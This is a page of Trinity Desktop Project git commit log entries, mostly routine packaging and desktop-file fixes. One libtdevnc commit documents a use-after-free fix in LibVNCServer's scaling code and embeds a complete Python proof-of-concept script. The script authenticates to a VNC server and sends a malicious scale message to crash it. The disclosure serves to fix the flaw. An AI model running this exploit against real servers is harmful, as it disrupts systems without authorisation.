[First Page] [Previous Page] [Next Page] [Last Page]
| GIT Hash | Branch | Date | Author | Log Message |
|---|---|---|---|---|
| 83c4cc5d [view] | master | 2014-10-22 01:27:23 -0500 | Timothy Pearson | [k3b] Bring most mimetypes in line with XDG specifications. The following are not fully verified in source as of this commit due to ubiquity: html, empty, info, make, man, misc, source, unknown |
| 60bbd0b8 [view] | master | 2014-10-22 01:27:23 -0500 | Timothy Pearson | [bibletime] Bring most mimetypes in line with XDG specifications. The following are not fully verified in source as of this commit due to ubiquity: html, empty, info, make, man, misc, source, unknown |
| 5959228d [view] | master | 2014-10-22 01:27:23 -0500 | Timothy Pearson | [amarok] Bring most mimetypes in line with XDG specifications. The following are not fully verified in source as of this commit due to ubiquity: html, empty, info, make, man, misc, source, unknown |
| 250abe52 [view] | master | 2014-10-22 13:05:08 +0900 | Michele Calgaro | [tdevelop] Updated 'KDE2 Development' TDevelop documentation toc files. This relates to bug #1859 Signed-off-by: Michele Calgaro |
| 5c2b6647 [view] | master | 2014-10-22 00:03:23 +0200 | François Andriot | [tde-packaging] RPM Packaging: update python-tqt |
| b642b90c [view] | master | 2014-10-21 23:41:48 +0200 | François Andriot | [tde-packaging] RPM Packaging: update sip4-tqt |
| 7f618578 [view] | master | 2014-10-21 23:34:48 +0200 | François Andriot | [tde-packaging] RPM Packaging: update sip4-tqt |
| 306ee286 [view] | master | 2014-10-21 23:29:23 +0200 | François Andriot | [tde-packaging] RPM Packaging: update sip4-tqt |
| 17066280 [view] | master | 2014-10-21 23:27:34 +0200 | François Andriot | [tde-packaging] RPM Packaging: update sip4-tqt |
| f30653ef [view] | master | 2014-10-21 23:22:31 +0200 | François Andriot | [tde-packaging] RPM Packaging: update sip4-tqt |
| c05df007 [view] | master | 2014-10-21 20:31:12 +0200 | François Andriot | [tde-packaging] RPM Packaging: update libcaldav |
| 0de2bc96 [view] | master | 2014-10-21 20:27:25 +0200 | François Andriot | [tde-packaging] RPM Packaging: update libcarddav |
| 5f8ce46a [view] | master | 2014-10-21 20:18:56 +0200 | François Andriot | [tde-packaging] RPM Packaging: update libcaldav |
| 86700847 [view] | master | 2014-10-21 20:14:03 +0200 | François Andriot | [tde-packaging] RPM Packaging: update libcaldav |
| 86c1f7f7 [view] | master | 2014-10-21 20:08:20 +0200 | François Andriot | [tde-packaging] RPM Packaging: update libcaldav |
| d8bc9838 [view] | master | 2014-10-21 17:57:11 +0200 | Christian Beier | [libtdevnc] Update ChangeLog for 0.9.10. |
| 298a1d12 [view] | master | 2014-10-21 17:52:32 +0200 | Christian Beier | [libtdevnc] Update NEWS. |
| 7fcc5f86 [view] | master | 2014-10-21 10:50:38 -0500 | Timothy Pearson | [tde-packaging] Add utopic symlink |
| 0aa204d8 [view] | master | 2014-10-21 17:44:20 +0200 | Christian Beier | [libtdevnc] Update comments regarding rfbClientConnectionGone(). |
| 668d3e37 [view] | master | 2014-10-21 17:33:28 +0200 | Christian Beier | [libtdevnc] Fix Use-After-Free vulnerability in LibVNCServer wrt scaling. Reported by Ken Johnson . The vulnerability would occur in both the rfbPalmVNCSetScaleFactor and rfbSetScale cases in the rfbProcessClientNormalMessage function of rfbserver.c. Sending a valid scaling factor is required (non-zero) if (msg.ssc.scale == 0) { rfbLogPerror("rfbProcessClientNormalMessage: will not accept a scale factor of zero"); rfbCloseClient(cl); return; } rfbStatRecordMessageRcvd(cl, msg.type, sz_rfbSetScaleMsg, sz_rfbSetScaleMsg); rfbLog("rfbSetScale(%d)\n", msg.ssc.scale); rfbScalingSetup(cl,cl->screen->width/msg.ssc.scale, cl->screen->height/msg.ssc.scale); rfbSendNewScaleSize(cl); << This is the call that can trigger a free. return; at the end, both cases there is a call the rfbSendNewScaleSize function, where if the connection is subsequently disconnected after sending the VNC scaling message can lead to a free occurring. else { rfbResizeFrameBufferMsg rmsg; rmsg.type = rfbResizeFrameBuffer; rmsg.pad1=0; rmsg.framebufferWidth = Swap16IfLE(cl->scaledScreen->width); rmsg.framebufferHeigth = Swap16IfLE(cl->scaledScreen->height); rfbLog("Sending a response to a UltraVNC style frameuffer resize event (%dx%d)\n", cl->scaledScreen->width, cl->scaledScreen->height); if (rfbWriteExact(cl, (char *)&rmsg, sz_rfbResizeFrameBufferMsg) < 0) { rfbLogPerror("rfbNewClient: write"); rfbCloseClient(cl); rfbClientConnectionGone(cl); << Call which may can lead to a free. return FALSE; } } return TRUE; Once this function returns, eventually rfbClientConnectionGone is called again on the return from rfbProcessClientNormalMessage. In KRFB server this leads to an attempt to access client->data. POC script to trigger the vulnerability: ---snip--- import socket,binascii,struct,sys from time import sleep class RFB: INIT_3008 = "\x52\x46\x42\x20\x30\x30\x33\x2e\x30\x30\x38\x0a" AUTH_NO_PASS = "\x01" AUTH_PASS = "\x02" SHARE_DESKTOP = "\x01" def AUTH_PROCESS(self,data,flag): if flag == 0: # Get security types secTypeCount = data[0] secType = {} for i in range(int(len(secTypeCount))): secType[i] = data[1] return secType elif flag == 1: # Get auth result # 0 means auth success # 1 means failure return data[3] def AUTH_PROCESS_CHALLENGE(self, data, PASSWORD): try: from Crypto.Cipher import DES except: print "Error importing crypto. Please fix or do not require authentication" sys.exit(1) if len(PASSWORD) != 8: PASSWORD = PASSWORD.ljust(8, '\0') PASSWORD_SWAP = [self.reverse_bits(ord(PASSWORD[0])),self.reverse_bits(ord(PASSWORD[1])),self.reverse_bits(ord(PASSWORD[2])),self.reverse_bits(ord(PASSWORD[3])),self.reverse_bits(ord(PASSWORD[4])),self.reverse_bits(ord(PASSWORD[5])),self.reverse_bits(ord(PASSWORD[6])),self.reverse_bits(ord(PASSWORD[7]))] PASSWORD = (struct.pack("BBBBBBBB",PASSWORD_SWAP[0],PASSWORD_SWAP[1],PASSWORD_SWAP[2],PASSWORD_SWAP[3],PASSWORD_SWAP[4],PASSWORD_SWAP[5],PASSWORD_SWAP[6],PASSWORD_SWAP[7])) crypto = DES.new(PASSWORD) return crypto.encrypt(data) def reverse_bits(self,x): a=0 for i in range(8): a += ((x>>i)&1)<<(7-i) return a def main(argv): print "Proof of Concept" print "Copyright TELUS Security Labs" print "All Rights Reserved.\n" try: HOST = sys.argv[1] PORT = int(sys.argv[2]) except: print "Usage: python setscale_segv_poc.py sys.exit(1) try: PASSWORD = sys.argv[3] except: print "No password supplied" PASSWORD = "" vnc = RFB() remote = socket.socket(socket.AF_INET, socket.SOCK_STREAM) remote.connect((HOST,PORT)) # Get server version data = remote.recv(1024) # Send 3.8 version remote.send(vnc.INIT_3008) # Get supported security types data = remote.recv(1024) # Process Security Message secType = vnc.AUTH_PROCESS(data,0) if secType[0] == "\x02": # Send accept for password auth remote.send(vnc.AUTH_PASS) # Get challenge data = remote.recv(1024) # Send challenge response remote.send(vnc.AUTH_PROCESS_CHALLENGE(data,PASSWORD)) elif secType[0] == "\x01": # Send accept for None pass remote.send(vnc.AUTH_NO_PASS) else: print 'The server sent us something weird during auth.' sys.exit(1) # Get result data = remote.recv(1024) # Process result result = vnc.AUTH_PROCESS(data,1) if result == "\x01": # Authentication failure. data = remote.recv(1024) print 'Authentication failure. Server Reason: ' + str(data) sys.exit(1) elif result == "\x00": print "Authentication success." else: print 'Some other authentication issue occured.' sys.exit(1) # Send ClientInit remote.send(vnc.SHARE_DESKTOP) # Send malicious message print "Sending malicious data..." remote.send("\x08\x08\x00\x00") remote.close() if __name__ == "__main__": main(sys.argv) ---snap--- |
| 8f70b1fe [view] | master | 2014-10-21 19:13:42 +0900 | Michele Calgaro | [tdevelop] Sort documentation list in increasing alphabetical order. Fixed KDE 2 handbook xml tags. This relates to bug #1859 Signed-off-by: Michele Calgaro |
| 65f290d3 [view] | master | 2014-10-20 22:21:24 +0200 | François Andriot | [tde-packaging] RPM Packaging: update tdebase |
| cb13775f [view] | master | 2014-10-20 22:16:47 +0200 | François Andriot | [tde-packaging] RPM Packaging: cleanup tdesvn |
| b61f82ab [view] | master | 2014-10-20 21:47:11 +0200 | François Andriot | [tde-packaging] RPM Packaging: update tdebase |
| 3083365f [view] | master | 2014-10-20 20:37:02 +0200 | François Andriot | [tde-packaging] RPM Packaging: update tdebase |
| 00328e5c [view] | master | 2014-10-20 20:06:09 +0200 | François Andriot | [tde-packaging] RPM Packaging: update R14 packages |
| 2d4cb96d [view] | master | 2014-10-20 09:39:45 +0200 | Slávek Banko | [tde-packaging] Refresh patches in tdebase on Ubuntu Signed-off-by: Slávek Banko |
| ea78ea00 [view] | master | 2014-10-20 04:31:26 +0200 | Slávek Banko | [tde-packaging] Revert "Fixed tdewebdev FTBFS in Debian/Ubuntu distros." This reverts commit 7c94b170cf00eaf2e5122bfab9da6c87dd11cf50. |
| 04db4606 [view] | master | 2014-10-20 04:19:46 +0200 | Slávek Banko | [admin] Fix automake icons installation Signed-off-by: Slávek Banko |
| 2bf50a73 [view] | master | 2014-10-20 04:18:08 +0200 | Slávek Banko | [tdegraphics] Fix kcontrol camera icon |
| 457cebb9 [view] | master | 2014-10-20 04:16:20 +0200 | Slávek Banko | [tdebase] Fix kcontrol spellcheck icon |
| f9f64585 [view] | master | 2014-10-19 21:07:40 -0500 | Timothy Pearson | [tde] Fix remaining missing semicolons at end of Keywords strings |
| fab9cc48 [view] | master | 2014-10-19 21:07:07 -0500 | Timothy Pearson | [tdetoys] Fix remaining missing semicolons at end of Keywords strings |
| 5058856b [view] | master | 2014-10-19 21:07:07 -0500 | Timothy Pearson | [tdevelop] Fix remaining missing semicolons at end of Keywords strings |
| 02fa9070 [view] | master | 2014-10-19 21:07:07 -0500 | Timothy Pearson | [tdeutils] Fix remaining missing semicolons at end of Keywords strings |
| eae0f6f5 [view] | master | 2014-10-19 21:07:06 -0500 | Timothy Pearson | [tdemultimedia] Fix remaining missing semicolons at end of Keywords strings |
| e8c9c085 [view] | master | 2014-10-19 21:07:06 -0500 | Timothy Pearson | [tdeaddons] Fix remaining missing semicolons at end of Keywords strings |
| d2bc3fca [view] | master | 2014-10-19 21:07:06 -0500 | Timothy Pearson | [tdepim] Fix remaining missing semicolons at end of Keywords strings |
| cce4a56a [view] | master | 2014-10-19 21:07:06 -0500 | Timothy Pearson | [tdebase] Fix remaining missing semicolons at end of Keywords strings |
| bf4643fc [view] | master | 2014-10-19 21:07:06 -0500 | Timothy Pearson | [tdenetwork] Fix remaining missing semicolons at end of Keywords strings |
| 75ea7502 [view] | master | 2014-10-19 21:07:06 -0500 | Timothy Pearson | [tdeadmin] Fix remaining missing semicolons at end of Keywords strings |
| 693fb742 [view] | master | 2014-10-19 21:07:06 -0500 | Timothy Pearson | [tdelibs] Fix remaining missing semicolons at end of Keywords strings |
| 45846699 [view] | master | 2014-10-19 21:07:06 -0500 | Timothy Pearson | [tdegraphics] Fix remaining missing semicolons at end of Keywords strings |
| 34c62c47 [view] | master | 2014-10-19 21:07:05 -0500 | Timothy Pearson | [tdeaccessibility] Fix remaining missing semicolons at end of Keywords strings |
| 81379399 [view] | master | 2014-10-19 21:07:04 -0500 | Timothy Pearson | [tde-systemsettings] Fix remaining missing semicolons at end of Keywords strings |
| 02e53f25 [view] | master | 2014-10-19 21:07:03 -0500 | Timothy Pearson | [kpilot] Fix remaining missing semicolons at end of Keywords strings |
| 3d950c9c [view] | master | 2014-10-19 21:07:02 -0500 | Timothy Pearson | [knemo] Fix remaining missing semicolons at end of Keywords strings |
| 0d70f392 [view] | master | 2014-10-19 21:07:02 -0500 | Timothy Pearson | [kiosktool] Fix remaining missing semicolons at end of Keywords strings |
| 653f30a1 [view] | master | 2014-10-19 21:07:01 -0500 | Timothy Pearson | [k3b] Fix remaining missing semicolons at end of Keywords strings |
| aa19e451 [view] | master | 2014-10-19 21:04:20 -0500 | Timothy Pearson | [tdepim] Revert "Fix remaining missing semicolons at end of Keywords strings" This reverts commit e51d886a5d03a1f4799dabbe7b518d2fac73c4bb. |
| 6774c44e [view] | master | 2014-10-19 21:04:20 -0500 | Timothy Pearson | [tdetoys] Revert "Fix remaining missing semicolons at end of Keywords strings" This reverts commit 995d497ce0f29ddab04b97dbb54002447b6d0a28. |
| 4d1e25b2 [view] | master | 2014-10-19 21:04:20 -0500 | Timothy Pearson | [tdevelop] Revert "Fix remaining missing semicolons at end of Keywords strings" This reverts commit 70f9cfbaeead1c3220a7b55880ba7c38c712ab1d. |
| 48b553fb [view] | master | 2014-10-19 21:04:20 -0500 | Timothy Pearson | [tdeutils] Revert "Fix remaining missing semicolons at end of Keywords strings" This reverts commit ea8f97246037c0681095c3eff9a29044c8516ee9. |
| 9382483b [view] | master | 2014-10-19 21:04:19 -0500 | Timothy Pearson | [tdegraphics] Revert "Fix remaining missing semicolons at end of Keywords strings" This reverts commit 99d765aca0f7323aa327238144266942d68a437c. |
| 6747a84a [view] | master | 2014-10-19 21:04:19 -0500 | Timothy Pearson | [tdenetwork] Revert "Fix remaining missing semicolons at end of Keywords strings" This reverts commit 125d8418ee991d6583f91acb8d4257253e2e055a. |
| 5c635afd [view] | master | 2014-10-19 21:04:19 -0500 | Timothy Pearson | [tdelibs] Revert "Fix remaining missing semicolons at end of Keywords strings" This reverts commit b921807cf0a561ae7eea42689826be7edbf5119a. |
| 011040ff [view] | master | 2014-10-19 21:04:19 -0500 | Timothy Pearson | [tdemultimedia] Revert "Fix remaining missing semicolons at end of Keywords strings" This reverts commit 8dce9b10382e94a40f19fc0e84300fab28dab989. |
| fe76130d [view] | master | 2014-10-19 21:04:18 -0500 | Timothy Pearson | [tdeadmin] Revert "Fix remaining missing semicolons at end of Keywords strings" This reverts commit ad90e12313cf38f8e0edf5d1693e6ba72b81db9e. |
| bc9d1d2a [view] | master | 2014-10-19 21:04:18 -0500 | Timothy Pearson | [tdeaddons] Revert "Fix remaining missing semicolons at end of Keywords strings" This reverts commit 2c845776d0c5b3dccda798c0669ce9067854d3a2. |
| b9637c75 [view] | master | 2014-10-19 21:04:18 -0500 | Timothy Pearson | [tdebase] Revert "Fix remaining missing semicolons at end of Keywords strings" This reverts commit fd2369a8f0b40ef35586b3407750ec4662d1be7e. |
| 9741507e [view] | master | 2014-10-19 21:04:18 -0500 | Timothy Pearson | [kpilot] Revert "Fix remaining missing semicolons at end of Keywords strings" This reverts commit bdac77f66fd9d4079827556269b846b4bf02041c. |
| 94b864b6 [view] | master | 2014-10-19 21:04:18 -0500 | Timothy Pearson | [knemo] Revert "Fix remaining missing semicolons at end of Keywords strings" This reverts commit fba534d01eade37e5cef8b009130a5b5caec37b2. |
| 6abfa210 [view] | master | 2014-10-19 21:04:18 -0500 | Timothy Pearson | [tdeaccessibility] Revert "Fix remaining missing semicolons at end of Keywords strings" This reverts commit 9fe64cd28cdfec84513bf0661d9eb780cdadaccf. |
| 0f126de2 [view] | master | 2014-10-19 21:04:18 -0500 | Timothy Pearson | [kiosktool] Revert "Fix remaining missing semicolons at end of Keywords strings" This reverts commit a2873ca62827057916bab1f4f300ae1e71590966. |
| 076909c3 [view] | master | 2014-10-19 21:04:18 -0500 | Timothy Pearson | [tde-systemsettings] Revert "Fix remaining missing semicolons at end of Keywords strings" This reverts commit 2c56d97a795c2440fd4e5a960b8f37b78dc96201. |
| f4b05ffa [view] | master | 2014-10-19 21:03:41 -0500 | Timothy Pearson | [k3b] Revert "Fix remaining missing semicolons at end of Keywords strings" This reverts commit 341a716f00e7c63976168112cafa4f68bb19cfd5. |
| 6916529f [view] | master | 2014-10-19 17:56:07 -0500 | Timothy Pearson | [tde] Fix remaining missing semicolons at end of Keywords strings |
| ea8f9724 [view] | master | 2014-10-19 17:55:39 -0500 | Timothy Pearson | [tdeutils] Fix remaining missing semicolons at end of Keywords strings |
| e51d886a [view] | master | 2014-10-19 17:55:39 -0500 | Timothy Pearson | [tdepim] Fix remaining missing semicolons at end of Keywords strings |
| 995d497c [view] | master | 2014-10-19 17:55:39 -0500 | Timothy Pearson | [tdetoys] Fix remaining missing semicolons at end of Keywords strings |
| 70f9cfba [view] | master | 2014-10-19 17:55:39 -0500 | Timothy Pearson | [tdevelop] Fix remaining missing semicolons at end of Keywords strings |
| fd2369a8 [view] | master | 2014-10-19 17:55:38 -0500 | Timothy Pearson | [tdebase] Fix remaining missing semicolons at end of Keywords strings |
| b921807c [view] | master | 2014-10-19 17:55:38 -0500 | Timothy Pearson | [tdelibs] Fix remaining missing semicolons at end of Keywords strings |
| 99d765ac [view] | master | 2014-10-19 17:55:38 -0500 | Timothy Pearson | [tdegraphics] Fix remaining missing semicolons at end of Keywords strings |
| 8dce9b10 [view] | master | 2014-10-19 17:55:38 -0500 | Timothy Pearson | [tdemultimedia] Fix remaining missing semicolons at end of Keywords strings |
| 125d8418 [view] | master | 2014-10-19 17:55:38 -0500 | Timothy Pearson | [tdenetwork] Fix remaining missing semicolons at end of Keywords strings |
| ad90e123 [view] | master | 2014-10-19 17:55:37 -0500 | Timothy Pearson | [tdeadmin] Fix remaining missing semicolons at end of Keywords strings |
| 9fe64cd2 [view] | master | 2014-10-19 17:55:37 -0500 | Timothy Pearson | [tdeaccessibility] Fix remaining missing semicolons at end of Keywords strings |
| 2c845776 [view] | master | 2014-10-19 17:55:37 -0500 | Timothy Pearson | [tdeaddons] Fix remaining missing semicolons at end of Keywords strings |
| bdac77f6 [view] | master | 2014-10-19 17:55:35 -0500 | Timothy Pearson | [kpilot] Fix remaining missing semicolons at end of Keywords strings |
| 2c56d97a [view] | master | 2014-10-19 17:55:35 -0500 | Timothy Pearson | [tde-systemsettings] Fix remaining missing semicolons at end of Keywords strings |
| fba534d0 [view] | master | 2014-10-19 17:55:34 -0500 | Timothy Pearson | [knemo] Fix remaining missing semicolons at end of Keywords strings |
| a2873ca6 [view] | master | 2014-10-19 17:55:34 -0500 | Timothy Pearson | [kiosktool] Fix remaining missing semicolons at end of Keywords strings |
| 341a716f [view] | master | 2014-10-19 17:55:33 -0500 | Timothy Pearson | [k3b] Fix remaining missing semicolons at end of Keywords strings |
| 0d23af4e [view] | master | 2014-10-19 18:08:03 +0200 | François Andriot | [tde-packaging] RPM Packaging: cleanup bibletime |
| 5d46a95d [view] | master | 2014-10-19 18:03:29 +0200 | François Andriot | [tde-packaging] OpenBSD: update R14 packages |
| d23cfa71 [view] | master | 2014-10-19 16:43:29 +0200 | François Andriot | [tde-packaging] RPM Packaging: update gtk3-tqt-engine |
| b1361757 [view] | master | 2014-10-19 22:50:07 +0900 | Michele Calgaro | [tde-packaging] Fixed tde-guidance FTBFS on Debian/Ubuntu caused by removal of powermanager module in commit faf34a76. Signed-off-by: Michele Calgaro |
| 7c94b170 [view] | master | 2014-10-19 15:59:23 +0900 | Michele Calgaro | [tde-packaging] Fixed tdewebdev FTBFS in Debian/Ubuntu distros. Signed-off-by: Michele Calgaro |
| 2a3acd6b [view] | master | 2014-10-18 18:36:11 -0500 | Timothy Pearson | [tde] Fix missing semicolons at end of Keywords strings |
| 1cf19d65 [view] | master | 2014-10-18 18:35:21 -0500 | Timothy Pearson | [tdevelop] Fix missing semicolons at end of Keywords strings |
| 46b8523e [view] | master | 2014-10-18 18:35:20 -0500 | Timothy Pearson | [tdeutils] Fix missing semicolons at end of Keywords strings |
| 6debe117 [view] | master | 2014-10-18 18:35:19 -0500 | Timothy Pearson | [tdetoys] Fix missing semicolons at end of Keywords strings |
| 05ccf6cf [view] | master | 2014-10-18 18:35:19 -0500 | Timothy Pearson | [tdepim] Fix missing semicolons at end of Keywords strings |
| a42932c2 [view] | master | 2014-10-18 18:35:18 -0500 | Timothy Pearson | [tdenetwork] Fix missing semicolons at end of Keywords strings |
| f6ce5119 [view] | master | 2014-10-18 18:35:17 -0500 | Timothy Pearson | [tdemultimedia] Fix missing semicolons at end of Keywords strings |
| bcdc321d [view] | master | 2014-10-18 18:35:17 -0500 | Timothy Pearson | [tdelibs] Fix missing semicolons at end of Keywords strings |
| 9cd4e12b [view] | master | 2014-10-18 18:35:17 -0500 | Timothy Pearson | [tdegraphics] Fix missing semicolons at end of Keywords strings |
| 0c11ace6 [view] | master | 2014-10-18 18:35:15 -0500 | Timothy Pearson | [tdebase] Fix missing semicolons at end of Keywords strings |
| b902031b [view] | master | 2014-10-18 18:35:14 -0500 | Timothy Pearson | [tdeadmin] Fix missing semicolons at end of Keywords strings |
[First Page] [Previous Page] [Next Page] [Last Page]
© 2010-2025 Trinity Desktop Project
